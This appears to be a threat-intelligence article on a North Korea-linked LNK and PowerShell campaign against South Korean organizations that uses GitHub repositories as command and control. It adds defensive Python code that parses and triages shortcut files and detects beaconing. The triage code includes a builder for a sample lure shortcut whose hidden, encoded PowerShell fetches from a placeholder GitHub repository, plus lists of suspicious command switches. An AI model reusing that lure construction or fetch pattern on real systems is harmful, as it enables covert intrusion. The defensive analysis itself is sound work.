Attackers are abusing Windows shortcut (LNK) files and GitHub in a multi-stage malware campaign aimed at organizations in South Korea. The operation chains LNK files, PowerShell scripting, and the GitHub API to deploy surveillance tools while blending into normal enterprise network traffic.
The campaign begins with weaponized LNK files. Rather than pointing at a document, the shortcut's target and command-line arguments launch a script when the file is opened. Early samples carried rich metadata, with recurring file names, sizes, and labels identifying the lure as a "Hangul Document" (HWP) file. Such indicators have repeatedly been associated with North Korean-affiliated groups such as Kimsuky, APT37, and Lazarus.
Over time, the attackers have refined the toolkit, adding simple decoding functions and hard-coding payloads directly into the LNK file's command-line arguments. When a victim opens what appears to be a PDF matching a legitimate Korean business theme (in fact the LNK file), a PowerShell script executes silently in the background, leaving nothing visible to the user.
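As an added illustration (this is not code from the FortiGuard report or from the campaign itself), the following Python script parses the Shell Link format (MS-SHLLINK) far enough to pull out the target path, the ShowCommand value and the command-line arguments, decodes a PowerShell -EncodedCommand payload, and flags the traits described above: a script-host target, a minimized launch, hidden-window and encoded-command switches, and arguments far longer than any ordinary shortcut needs. The sample shortcut is constructed inline; its layout, the token value and the GitHub repository path inside it are placeholders, not indicators from the campaign.

```python
import base64
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1) that decide which optional structures follow the header
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
STRING_DATA_ORDER = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                     (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                     (HAS_ICON_LOCATION, "icon_location"))
SW_SHOWMINNOACTIVE = 7  # ShowCommand that starts the target minimized and unfocused
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

SCRIPT_HOSTS = ("powershell", "pwsh", "wscript", "cscript", "mshta", "cmd.exe", "rundll32")
ARGUMENT_MARKERS = ("-windowstyle hidden", "-w hidden", "-enc", "-executionpolicy bypass",
                    "-ep bypass", "frombase64string", "invoke-expression", "iex ",
                    "api.github.com", "raw.githubusercontent.com")


def parse_lnk(data):
    """Return header fields and StringData strings of a Shell Link (.lnk) file."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link (bad HeaderSize or LinkCLSID)")
    flags, = struct.unpack_from("<I", data, 20)          # LinkFlags at offset 20
    show_command, = struct.unpack_from("<I", data, 60)   # ShowCommand at offset 60
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:                  # IDListSize (u16) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                            # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    info = {"flags": flags, "show_command": show_command}
    for bit, name in STRING_DATA_ORDER:                  # CountCharacters + chars, no terminator
        if not flags & bit:
            continue
        count, = struct.unpack_from("<H", data, pos)
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        info[name] = data[pos:pos + count * width].decode("utf-16-le" if width == 2 else "cp1252")
        pos += count * width
    return info


def decode_encoded_command(arguments):
    """Return the script behind -EncodedCommand/-enc (Base64 of UTF-16LE), or None."""
    tokens = arguments.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower().startswith("-enc"):
            try:
                return base64.b64decode(tokens[i + 1]).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def triage_lnk(data):
    """Parse a shortcut and return (parsed fields, list of indicator codes)."""
    info = parse_lnk(data)
    findings = []
    launch = (info.get("relative_path", "") + " " + info.get("working_dir", "")).lower()
    if any(h in launch for h in SCRIPT_HOSTS):
        findings.append("script_host_target")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("minimized_launch")
    args = info.get("arguments", "")
    findings += ["arg_marker:" + m.strip() for m in ARGUMENT_MARKERS if m in args.lower()]
    if len(args) > 260:  # a payload carrier; real shortcuts rarely need this much
        findings.append("oversized_arguments")
    decoded = decode_encoded_command(args)
    if decoded:
        info["decoded_command"] = decoded
        findings += ["decoded_marker:" + m.strip() for m in ARGUMENT_MARKERS if m in decoded.lower()]
    return info, findings


# --- constructed samples (placeholders, not artifacts from the campaign) ---
def _string_data(text):
    return struct.pack("<H", len(text)) + text.encode("utf-16-le")


def build_lnk(relative_path, arguments, show_command):
    """Build a minimal LNK: header, RELATIVE_PATH and COMMAND_LINE_ARGUMENTS strings only."""
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LNK_CLSID,
                         HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE,
                         0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    return header + _string_data(relative_path) + _string_data(arguments)


SAMPLE_SCRIPT = ("$t='ghp_EXAMPLETOKEN'; Invoke-RestMethod -Headers @{Authorization=\"token $t\"} "
                 "'https://api.github.com/repos/example-user/example-repo/contents/beacon.txt'")
MALICIOUS_LNK = build_lnk(
    "..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "-WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -EncodedCommand "
    + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode(),
    SW_SHOWMINNOACTIVE)
BENIGN_LNK = build_lnk("..\\Documents\\report.docx", "", 1)  # SW_SHOWNORMAL

if __name__ == "__main__":
    for label, blob in (("lure", MALICIOUS_LNK), ("benign", BENIGN_LNK)):
        parsed, hits = triage_lnk(blob)
        print(label, parsed["relative_path"], parsed["show_command"], hits)
        print("  decoded stage:", parsed.get("decoded_command"))
```

The parser deliberately stops after StringData; the ExtraData blocks that follow (and the LinkInfo block it skips) hold volume and machine identifiers that are useful for attribution but not for deciding whether a shortcut launches a script. Feed it real files with `open(path, "rb").read()`.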
Earlier iterations of this campaign, observed as early as 2024, used basic string concatenation to obscure a GitHub command-and-control (C2) URL and an access token, according to FortiGuard Labs. Routing commands through GitHub lets the attackers hide inside the TLS-encrypted traffic to GitHub that most corporate networks already allow, which makes the communication hard to separate from legitimate developer activity.
The PowerShell script embedded in the LNK files takes precautions against analysis. It checks for virtualization, debugging, and forensic tools such as VMware, VirtualBox, and Wireshark, and exits immediately if any are found, so that sandboxes and analysts' machines never see the later stages. If nothing is detected, the script reassembles Base64-encoded strings into a VBScript payload and writes it to a randomly named directory under %Temp%.
For persistence, the malware registers a Scheduled Task that runs the VBScript every thirty minutes. The task carries an elaborate name resembling an ordinary document title so that it does not stand out in the task list. More recent variants have stripped away nearly all identifying metadata but still contain a decoder that unpacks both a decoy PDF and the next-stage PowerShell script.
The VBScript relaunches the PowerShell payload in a hidden window, so execution continues without anything visible to the user. That script gathers host reconnaissance data, including the operating system version and build, last boot time, and a list of running processes, writes it to a log, and uploads the log to an attacker-controlled GitHub repository using a hardcoded access token.
Researchers traced these uploads to a GitHub user named "motoralis," whose private-repository activity coincided with spikes in LNK-based phishing observed since 2025. Other usernames, including God0808RAMA, Pigresy80, and pandora0009, point to a broader pool of dormant and newly activated accounts behind the infrastructure. Some accounts sit idle for long stretches while others are activated at intervals, giving the attackers a C2 layer that survives the takedown of any single account.
The security implications of using GitHub as C2 are significant. Because payloads and logs sit in private repositories, defenders cannot inspect their contents directly. Worse, on the wire the malware's traffic is ordinary TLS to GitHub, which most corporate networks permit, so domain- and reputation-based controls do not flag it.
This approach exemplifies a broader trend of threat actors abusing trusted public platforms, from software development services to file-sharing sites, to host malware and exfiltrate data while evading URL- and domain-based blocking.
In the third stage, a slimmed-down PowerShell component keeps an active connection to the GitHub-hosted C2. It periodically pulls commands or additional payloads from a designated raw file path in the motoralis repository, using the previously created Scheduled Task as its heartbeat. A dedicated "keep-alive" script collects the current network configuration and posts it back to the repository, naming each log with a date and timestamp in a fixed format.
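To show what the persistence mechanism and the task-driven GitHub heartbeat described in the preceding paragraphs look like in endpoint telemetry, here is an added Python example (not part of the FortiGuard report) that runs three detection rules over constructed events modelled on Sysmon process-creation and network-connection records and on Windows Security event 4698 (scheduled task created). The host names, paths, task name and timestamps are invented; the 30-minute cadence, the script-host-to-GitHub traffic and the wscript-launched hidden PowerShell are the behaviours the article describes. The periodicity rule generalizes beyond this campaign: it flags any script host reaching GitHub on a near-fixed schedule, whatever the interval.

```python
from collections import defaultdict
from datetime import datetime

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "mshta.exe"}
GITHUB_ENDPOINTS = {"api.github.com", "raw.githubusercontent.com", "github.com"}
HIDDEN_WINDOW_MARKERS = ("-windowstyle hidden", "-w hidden", "-win hidden")


def exe_name(path):
    """Lower-cased file name of an image path or of the first token of a task action."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def under_temp(path):
    p = path.lower()
    return "\\temp\\" in p or "%temp%" in p


def rule_hidden_powershell_from_script_host(events):
    """Stage 2: wscript/cscript spawning PowerShell with a hidden window."""
    alerts = []
    for e in events:
        if e["type"] != "process" or exe_name(e["image"]) not in {"powershell.exe", "pwsh.exe"}:
            continue
        if exe_name(e["parent"]) in {"wscript.exe", "cscript.exe"} and \
                any(m in e["cmdline"].lower() for m in HIDDEN_WINDOW_MARKERS):
            alerts.append(("hidden_powershell_from_script_host", e["host"], e["cmdline"]))
    return alerts


def rule_temp_script_persistence(events):
    """Persistence: a scheduled task whose action runs a script host on a file under %Temp%."""
    alerts = []
    for e in events:
        if e["type"] != "task_created":
            continue
        if exe_name(e["action"].split()[0]) in SCRIPT_HOSTS and under_temp(e["action"]):
            alerts.append(("temp_script_scheduled_task", e["host"],
                           f'{e["task"]} repeats {e["interval"]}: {e["action"]}'))
    return alerts


def rule_periodic_github_beacon(events, min_hits=3, max_jitter=120):
    """Stage 3: a script host reaching GitHub at a near-constant interval (the task heartbeat)."""
    seen = defaultdict(list)
    for e in events:
        if e["type"] == "network" and e["dest"] in GITHUB_ENDPOINTS \
                and exe_name(e["image"]) in SCRIPT_HOSTS:
            seen[(e["host"], exe_name(e["image"]))].append(datetime.fromisoformat(e["ts"]))
    alerts = []
    for (host, image), times in seen.items():
        times.sort()
        if len(times) < min_hits:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if max(gaps) - min(gaps) <= max_jitter:  # low jitter = scheduler-driven, not a human
            period = round(sum(gaps) / len(gaps))
            alerts.append(("periodic_github_beacon", host,
                           f"{image} -> GitHub every ~{period}s ({len(times)} hits)"))
    return alerts


def run_rules(events):
    return (rule_hidden_powershell_from_script_host(events)
            + rule_temp_script_persistence(events)
            + rule_periodic_github_beacon(events))


# --- constructed telemetry: one infected workstation (WS-17) and one developer box (WS-22) ---
TEMP = "C:\\Users\\kim\\AppData\\Local\\Temp\\a8f31c\\"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
WSCRIPT = "C:\\Windows\\System32\\wscript.exe"
CHROME = "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"
EVENTS = [
    {"ts": "2025-03-04T09:00:05", "type": "process", "host": "WS-17", "image": PS,
     "parent": "C:\\Windows\\explorer.exe", "cmdline": "powershell.exe -WindowStyle Hidden -NoProfile -EncodedCommand JAB..."},
    {"ts": "2025-03-04T09:00:07", "type": "task_created", "host": "WS-17",
     "task": "\\Hangul Document Update Service", "action": WSCRIPT + " " + TEMP + "update.vbs", "interval": "PT30M"},
    {"ts": "2025-03-04T09:30:02", "type": "process", "host": "WS-17", "image": WSCRIPT,
     "parent": "C:\\Windows\\System32\\svchost.exe", "cmdline": "wscript.exe " + TEMP + "update.vbs"},
    {"ts": "2025-03-04T09:30:03", "type": "process", "host": "WS-17", "image": PS,
     "parent": WSCRIPT, "cmdline": "powershell.exe -WindowStyle Hidden -File " + TEMP + "stage.ps1"},
    {"ts": "2025-03-04T09:30:09", "type": "network", "host": "WS-17", "image": PS, "dest": "api.github.com", "port": 443},
    {"ts": "2025-03-04T10:00:11", "type": "network", "host": "WS-17", "image": PS, "dest": "api.github.com", "port": 443},
    {"ts": "2025-03-04T10:30:08", "type": "network", "host": "WS-17", "image": PS, "dest": "raw.githubusercontent.com", "port": 443},
    {"ts": "2025-03-04T11:00:10", "type": "network", "host": "WS-17", "image": PS, "dest": "api.github.com", "port": 443},
    # benign: git and a browser on a developer box, at irregular times
    {"ts": "2025-03-04T09:12:41", "type": "network", "host": "WS-22", "image": "C:\\Program Files\\Git\\cmd\\git.exe", "dest": "github.com", "port": 443},
    {"ts": "2025-03-04T09:41:03", "type": "network", "host": "WS-22", "image": CHROME, "dest": "api.github.com", "port": 443},
    {"ts": "2025-03-04T10:03:55", "type": "network", "host": "WS-22", "image": CHROME, "dest": "api.github.com", "port": 443},
    # benign: a vendor updater task that runs an installed binary once a day
    {"ts": "2025-03-04T09:15:00", "type": "task_created", "host": "WS-22", "task": "\\VendorUpdate",
     "action": "C:\\Program Files\\Vendor\\update.exe /silent", "interval": "P1D"},
]

if __name__ == "__main__":
    for rule, host, detail in run_rules(EVENTS):
        print(f"[{rule}] {host}: {detail}")
```

The first launch from explorer.exe is deliberately not alerted on by these rules: a user opening a shortcut that starts PowerShell is noisy on its own, and the stronger signals are the script-host parent, the %Temp% task action, and the jitter-free cadence of connections. Tune `max_jitter` to your scheduler's observed drift; 120 seconds is generous for a task that fires every 30 minutes.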
By chaining LNK shortcuts, native Windows scripting (PowerShell and VBScript), Scheduled Tasks, and the GitHub API, the attackers sidestep detectors tuned for executable malware and keep their on-disk footprint small. Security teams should treat unexpected LNK and document files with heightened suspicion, increase monitoring of PowerShell and wscript.exe/cscript.exe activity (PowerShell script block logging and process-creation auditing with command lines capture the hidden-window and encoded-command launches described here), and baseline legitimate GitHub usage so that API calls from script hosts or other unusual access patterns stand out.

